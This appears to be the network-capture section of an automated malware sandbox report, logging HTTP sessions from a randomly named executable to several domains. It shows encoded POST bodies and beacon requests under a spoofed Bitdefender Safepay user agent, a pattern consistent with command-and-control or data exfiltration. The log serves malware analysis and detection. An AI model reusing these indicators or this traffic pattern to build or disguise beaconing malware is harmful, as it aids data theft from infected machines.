                                                                                Data Ascii: ynlT=puifggN9xZ4AnJSFrVL59VI1q5wAIexDsSwCqp18Q4hFB4WQckc4+3fpZyrFYUutAxojUuCZU99SMfgJPykTWs0v5dJckFNy3psIIxyQqTyR00o38SmLs0KNn8BTNVusuJsYyzYNJYJKULfEz9j3x1c2CC+QvqjtBv5TdgZkEs6EI47fV464U9Vq1ALEcPCOMywCYKEDak67Z9LjIXpZVzqPFKX0oKMOEVprAeSs/z3OoaYrjb4P1FQANJ2oM1G+lSHcJSimyUIT5D7DDtLeYNT/TFnX3s0C/R0mRUKuCO1vylKBX1QxMWoA0hpk5V7loaOVA2x6zP1dL/RsB2s46G6A+4pdA8NHie/67ZIMWhDGv9OKLLfhb6yN4aqLHlO4bnzhAF0s99KLAhBBkvb/RwyTtHGQKwqemKIzQg53gfTvlAoW/878Pl8CasnPjyHcJh2m4P2Jik1GQlbhr4dTgieRoejHfLbQmdFBmru//aH+/FtyrrTqyUIMCl10ssNXX6heiXhfa1jkMjEkxhCE63YDNa+SEsU2KsFlTtGCL4/aoE/MwPPIDmJxNB/EmgkJvQ+br8P4/Zj1GCZvsPdp05I7kZp/kL5uEeLzCqdJIsqM87x2OOf80xlEQOrDLcSIlEYo0qZWh/bgpPu4//75kpxfEnUHZJm5LRAHtanX9udVQba+aZgMGXxshXogw1TCnfBS+rUlLfkZ0CObDBz5Ek8aB+kL5wIq8OCQQ2F19CKJMbqXa0p0+e/I3U0iWoT4IFz2mXw9luKA9GVmb76qwOrpItDFBk2JhT4jn2wrYgB+PbfL2FXOIIZQX9j60wynv93Xy7hZWkgi+nKIlvU+BmzZMFe+obmurJ9PUfC7VR2ZJjKsB34zzRBuac3KgXT7ZMqsUVxDaeZqTJNsPcp8xGg5kiDWepCMjl9aBXIphxdG7H7Y37HBt2rBRcSFosMnbuItaO2Hy3pUY9gOJhEQM+E7XgISq0Sh17wiPMwzTv9mnfh [TRUNCATED]


                                                                                Session ID: 20 | Source IP: 192.168.2.8 | Source Port: 49733 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:09.250710011 CET | 449 bytes | OUT | GET /r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:10.336684942 CET | 409 bytes | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 26 Nov 2024 08:29:10 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 269
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 6e 6c 54 3d 6b 73 4b 2f 6a 55 4d 51 77 6f 45 33 77 34 71 45 2f 47 2f 51 70 6e 63 42 71 59 46 62 45 38 70 6d 6f 6a 74 68 73 66 68 6e 57 4e 4e 62 43 65 69 4c 53 55 67 59 33 68 50 38 57 52 36 6c 51 6b 32 54 48 30 4d 6d 62 73 2b 65 57 39 5a 4e 4b 34 4d 79 4e 6d 34 69 64 75 49 67 37 66 39 6d 68 67 5a 45 34 75 63 32 4f 41 79 6b 6b 55 53 2f 31 68 49 71 78 78 61 59 35 32 37 4e 68 4d 68 52 4c 6d 37 62 74 41 3d 3d 26 42 5a 63 70 3d 46 78 4c 78 73 4e 43 78 33 78 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt"}</script></head></html>


                                                                                Session ID: 21 | Source IP: 192.168.2.8 | Source Port: 49734 | Destination IP: 38.47.233.4 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:16.413953066 CET | 695 bytes | OUT | POST /fqrq/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.qqc5.top
                                                                                Referer: http://www.qqc5.top/fqrq/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 73 31 4a 69 69 38 6b 72 4b 37 4d 61 62 39 72 2b 61 55 54 6f 2b 79 63 64 7a 53 33 75 44 6d 46 30 79 49 78 6c 6d 6d 63 35 54 5a 56 4a 4d 44 69 63 47 6b 78 32 32 6a 33 54 55 4d 49 2b 50 69 4e 43 7a 75 6a 68 44 30 63 33 6b 63 55 71 31 37 59 74 7a 73 67 37 58 30 76 4e 52 53 75 50 2b 61 73 48 68 75 55 37 71 39 78 57 75 39 63 6b 6d 36 49 63 4e 31 36 6f 2b 36 4d 42 76 58 59 69 56 59 45 64 6e 75 79 67 51 51 37 70 51 30 64 59 42 67 4c 50 68 63 2b 73 54 56 76 4d 74 45 48 6a 69 56 49 75 6e 54 34 78 39 33 56 30 77 64 78 47 6b 62 71 46 4e 49 54 58 4c 50 6a 4a 4d 69 51 3d
                                                                                Data Ascii: ynlT=V20nVuuNf5SAs1Jii8krK7Mab9r+aUTo+ycdzS3uDmF0yIxlmmc5TZVJMDicGkx22j3TUMI+PiNCzujhD0c3kcUq17Ytzsg7X0vNRSuP+asHhuU7q9xWu9ckm6IcN16o+6MBvXYiVYEdnuygQQ7pQ0dYBgLPhc+sTVvMtEHjiVIunT4x93V0wdxGkbqFNITXLPjJMiQ=
                                                                                Nov 26, 2024 09:29:18.035614967 CET | 691 bytes | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID: 22 | Source IP: 192.168.2.8 | Source Port: 49735 | Destination IP: 38.47.233.4 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:19.234749079 CET | 715 bytes | OUT | POST /fqrq/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.qqc5.top
                                                                                Referer: http://www.qqc5.top/fqrq/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 32 55 35 69 75 37 77 72 4e 62 4d 5a 59 39 72 2b 54 30 53 76 2b 31 55 64 7a 54 6a 2b 44 77 74 30 78 71 35 6c 67 58 63 35 53 5a 56 4a 44 6a 69 64 49 45 78 4c 32 6a 37 74 55 4d 30 2b 50 69 4a 43 7a 72 66 68 43 48 45 30 6c 4d 55 73 34 62 59 76 75 38 67 37 58 30 76 4e 52 53 36 70 2b 61 30 48 68 2b 45 37 72 63 78 56 74 39 63 6e 68 36 49 63 62 31 36 6b 2b 36 4d 6a 76 57 30 45 56 61 4d 64 6e 74 6d 67 51 69 54 71 4c 6b 64 61 63 51 4b 44 78 4a 44 32 4c 69 6e 75 70 43 48 36 67 6e 45 6c 72 46 4a 62 6e 56 64 79 7a 64 5a 74 6b 59 43 7a 49 2f 4f 2f 52 73 7a 35 53 31 46 61 6a 6d 41 38 73 45 70 77 72 34 56 6d 37 54 48 47 47 6b 56 57
                                                                                Data Ascii: ynlT=V20nVuuNf5SA2U5iu7wrNbMZY9r+T0Sv+1UdzTj+Dwt0xq5lgXc5SZVJDjidIExL2j7tUM0+PiJCzrfhCHE0lMUs4bYvu8g7X0vNRS6p+a0Hh+E7rcxVt9cnh6Icb16k+6MjvW0EVaMdntmgQiTqLkdacQKDxJD2LinupCH6gnElrFJbnVdyzdZtkYCzI/O/Rsz5S1FajmA8sEpwr4Vm7THGGkVW
                                                                                Nov 26, 2024 09:29:20.664648056 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:20 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                23 | 192.168.2.8 | 49736 | 38.47.233.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:22.082773924 CET | 1732 | OUT | POST /fqrq/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.qqc5.top
                                                                                Referer: http://www.qqc5.top/fqrq/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT= [TRUNCATED]
                                                                                Nov 26, 2024 09:29:23.582566977 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                24 | 192.168.2.8 | 49737 | 38.47.233.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:24.750760078 CET | 448 | OUT | GET /fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:26.297172070 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                25 | 192.168.2.8 | 49738 | 199.192.23.123 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:31.949333906 CET | 710 | OUT | POST /6npp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.learnnow.info
                                                                                Referer: http://www.learnnow.info/6npp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=unOdt6hg6b46MFp8esFGRviQLUODOsmpTBT9WzWtjFx9RCQ7FyDzmfzD2/uL+q5cTZqiKqdLk97pPt6fej/0pG6bwn3do+f8W1/BQz7pWWjc2vf4n+Mem4YMHGd/mN/NRoJ1Iqq212IcUkWwkxmCdDIFxSsOzIzv5WQNVjzQT43vQBDON7zmP7Mab4hmnrO7A2I5Q2k=
                                                                                Nov 26, 2024 09:29:33.212165117 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:32 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                26 | 192.168.2.8 | 49739 | 199.192.23.123 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:34.629225969 CET | 730 | OUT | POST /6npp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.learnnow.info
                                                                                Referer: http://www.learnnow.info/6npp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=unOdt6hg6b46Nk58NdFGGfiTB0ODbcmyTBP9WyS9/nl9UWc7KTDzlfzDvPuOwK5LTZWAKrhLk9HpPsKfey/37m6F7H3f1Of8W1/BQzuhWSHc2eP4mb4d4oYPXWd/iN/JRoJHIofT1wEcUm+wkgmNUDIL/ytejdqax0Y3XyfsQJuQV3ykXZ7gM7kxb7JQicTTaVYJOhx/Xtgq+p9VxBwq783dqO1e
                                                                                Nov 26, 2024 09:29:35.890691042 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:35 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                27 | 192.168.2.8 | 49740 | 199.192.23.123 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:37.297075987 CET | 1747 | OUT | POST /6npp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.learnnow.info
                                                                                Referer: http://www.learnnow.info/6npp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=unOdt6hg6b46Nk58NdFGGfiTB0ODbcmyTBP9WyS9/nd9I1U7L0XzkfzDnvuPwK5WTZ+EKrswk7LpMLifJ2L3iW6F0n3eo+fpW1P7Qz+hWSHc2dn4hOMd6oYMHGcwmN/xRoR9Iobp1AkcXGuwmSONbDJtySsbjduzx3sBXybCQOCQXTu9M53PdowRfrRumfrybnoTT2h9QNs5pJxVyx98tJ7bloMR2ZiQ35NWC/rKCAAQwwxH0Nyzh2qxrMhTBWPzO8HmzcrkSKVf23tq6KkpQzflnYLSYqvXR5wvoMc5S4rB1lySYVBO+gm9H8bUXx9YhE5Hzj3jlgwltLa5gTIzkXKEZ1l0DVa2hKFZazTWLfDoLe5QFdrMMfdqehJLkRZXuhJ6c7GaTL4OC7VJKmvC04quNkVwQwT4V0fWOLYA7AlD0ZzstmXYwKIgbiM5e4GxW9jhS2wzMqBdl1qpCmOna24gseTV/uAXqLc6QpJzv5MAKgydw/aKvguFMvw8OE9FT+rqLIvUZW2SdNkACqe/Bo5K12ESrbYrkXuANDm4puxCmx2P5r4aBYbgQBfDpzNxORCTNS0cUHykTXN/HE4UVv7e/BcrJXxR/+ucaQAbMn0HwK1SQKgGHTn8cmA0BDWtwOnjETlDRG1UWVDuQ807xXPXHTm09DfCkVaR7QiZSW7n65Xfv/2mKgjwra4UApcA/1mm0fSB9AEXYKDeoMN3U0XNGfkwMAaLqmsC5sf5rW6DfR/WgRU0iWevgdHY8OGNiUa21sggopEfkdGJGaf9e609FL5aqj2ldJ8ZWDvVKgEjdU6pjaYcwemJi5sBL71tr1LxGdy6Zeaz9TMGPndXtFLFgnpmPKnDTjsrIQBW/oQwnDS6R/s04sJiqT1M4ZTsKwksZalfhaC17bU8XQWuRKMsG6jE3hs4+RrKQW2Thg3fjramJ8p//kbay/eqo/88gAF6fPIi4HSXg8rpO2WzGxo8wCPY9hdGY0qQdNb8djwDSKw [TRUNCATED]
                                                                                Nov 26, 2024 09:29:38.677603960 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:38 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                28 | 192.168.2.8 | 49741 | 199.192.23.123 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:39.949367046 CET | 453 | OUT | GET /6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:41.219185114 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:41 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                29 | 192.168.2.8 | 49742 | 104.21.36.239 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:47.037352085 CET | 719 | OUT | POST /eln6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.goldbracelet.top
                                                                                Referer: http://www.goldbracelet.top/eln6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 73 55 45 56 4e 31 43 30 42 78 33 4f 47 63 66 54 45 31 6f 46 77 32 45 56 78 34 34 30 46 5a 74 56 50 6c 63 76 4e 31 67 36 45 38 76 45 62 54 65 62 44 67 76 33 69 42 5a 47 76 54 76 48 76 4f 6f 43 73 42 58 47 47 2f 66 56 63 39 41 4f 6f 53 72 4a 62 58 56 78 68 31 70 37 56 71 6a 31 41 76 65 49 34 64 4e 61 45 72 31 58 47 6e 77 53 63 65 34 65 33 59 57 4c 72 66 34 41 6d 53 72 63 68 67 36 4e 57 70 59 72 73 50 58 68 47 54 79 32 70 44 48 4f 68 34 52 33 4a 31 37 44 51 72 51 6a 42 38 6f 2b 6b 56 35 41 41 70 52 45 37 57 4d 6b 66 4c 30 45 66 38 49 70 69 63 41 72 56 62 30 3d
                                                                                Data Ascii: ynlT=QTR40tOSZ0kPsUEVN1C0Bx3OGcfTE1oFw2EVx440FZtVPlcvN1g6E8vEbTebDgv3iBZGvTvHvOoCsBXGG/fVc9AOoSrJbXVxh1p7Vqj1AveI4dNaEr1XGnwSce4e3YWLrf4AmSrchg6NWpYrsPXhGTy2pDHOh4R3J17DQrQjB8o+kV5AApRE7WMkfL0Ef8IpicArVb0=
                                                                                Nov 26, 2024 09:29:48.196850061 CET | 960 | IN | HTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:48 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
